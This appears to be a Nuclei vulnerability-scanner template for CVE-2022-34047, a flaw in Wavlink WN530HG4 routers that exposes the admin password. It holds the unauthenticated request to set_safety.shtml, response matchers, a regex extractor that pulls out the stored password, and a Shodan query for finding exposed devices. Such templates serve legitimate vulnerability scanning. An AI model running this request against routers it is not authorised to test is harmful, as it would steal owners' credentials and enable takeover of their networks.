nuclei-templates/cves/2022/CVE-2022-34047.yaml

46 lines
1.3 KiB
YAML

id: CVE-2022-34047
info:
name: Wavlink Set_safety.shtml - Password Exposure
author: For3stCo1d
severity: high
description: |
An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd].
reference:
- https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
- http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34047
cwe-id: CWE-668
metadata:
shodan-query: http.title:"Wi-Fi APP Login"
verified: "true"
tags: cve2022,wavlink,router,exposure,packetstorm,cve
requests:
- raw:
- |
GET /set_safety.shtml?r=52300 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'var syspasswd="'
- '<title>APP</title>'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
regex:
- 'syspasswd="(.+?)"'